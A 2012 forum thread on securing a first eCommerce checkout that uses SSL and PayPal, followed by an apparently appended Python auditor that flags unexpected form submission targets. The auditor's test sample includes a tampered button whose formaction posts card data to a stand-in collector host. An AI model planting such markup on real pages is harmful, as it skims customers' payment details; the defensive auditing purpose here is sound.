sh0wtym3 Posted July 20, 2012

Hey all,

I'm setting up a shopping cart for a website, and I've installed an SSL certificate so the credit card information will be taken on a secure encrypted https connection. So far everything is working fine. The shopping cart will be communicating with a PayPal API.

This is my first time building an eCommerce website, and I wanted to know if there are any security precautions I should be aware of? Am I good to go with just a secure connection?

I'm also redirecting all http requests to https on the checkout page through the .htaccess file, to make sure no user accidentally ends up filling out their credit card information on an unsecure connection.

scootstah Posted July 21, 2012

As long as you're using something like PayPal to process the cards, you should be okay. But, don't store any card information on your own servers. If you have to ask, you don't have the experience to do that safely.

sh0wtym3 Posted July 21, 2012

Ok thanks. And I won't, I'll only be storing non-cc info in the database (name, address, phone, email).

xyph Posted July 22, 2012

Get a security professional, or a couple good eyes to audit your code. If someone gets in and modifies the action of your form, or finds an XSS hole to do the same, your SSL cert won't help.

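The form-action tampering raised in the last reply can be watched for from outside the application. The following is an added example, not code posted by anyone in the thread: it parses the checkout page's HTML and reports any form submission target that is not HTTPS on an expected host. `PAGE_URL`, `ALLOWED_HOSTS`, the function name and the sample pages are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed values for illustration; substitute the real checkout URL and hosts.
PAGE_URL = "https://shop.example/checkout.php"
ALLOWED_HOSTS = {"shop.example", "www.paypal.com"}


class FormTargetCollector(HTMLParser):
    """Collects every URL a form on the page could submit to."""
    def __init__(self):
        super().__init__()
        self.base = None      # <base href> changes how relative actions resolve
        self.targets = []     # (tag, raw attribute value)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href") and self.base is None:
            self.base = a["href"]
        elif tag == "form":
            # A missing or empty action posts back to the page itself.
            self.targets.append((tag, a.get("action") or ""))
        elif tag in ("button", "input") and a.get("formaction"):
            # formaction on a submit control overrides the form's action.
            self.targets.append((tag, a["formaction"]))


def audit_form_targets(html, page_url=PAGE_URL, allowed=ALLOWED_HOSTS):
    """Return a list of (tag, resolved_url, reason) for unexpected targets."""
    p = FormTargetCollector()
    p.feed(html)
    base = urljoin(page_url, p.base) if p.base else page_url
    findings = []
    for tag, raw in p.targets:
        url = urljoin(base, raw.strip())
        parts = urlsplit(url)
        if parts.scheme != "https":
            findings.append((tag, url, "not https"))
        elif parts.hostname not in allowed:
            findings.append((tag, url, "host not allowlisted"))
    return findings


# Constructed sample pages, not taken from the thread.
CLEAN = '<form method="post" action="/pay.php"><input name="cc"></form>'
TAMPERED = ('<form method="post" action="/pay.php"><input name="cc">'
            '<button formaction="https://collector.invalid/c">Pay</button></form>')

print(audit_form_targets(TAMPERED))
```

This inspects only the HTML the server returns, so a script that rewrites the form in the browser at runtime is outside what it can see; that case still needs the code audit recommended above.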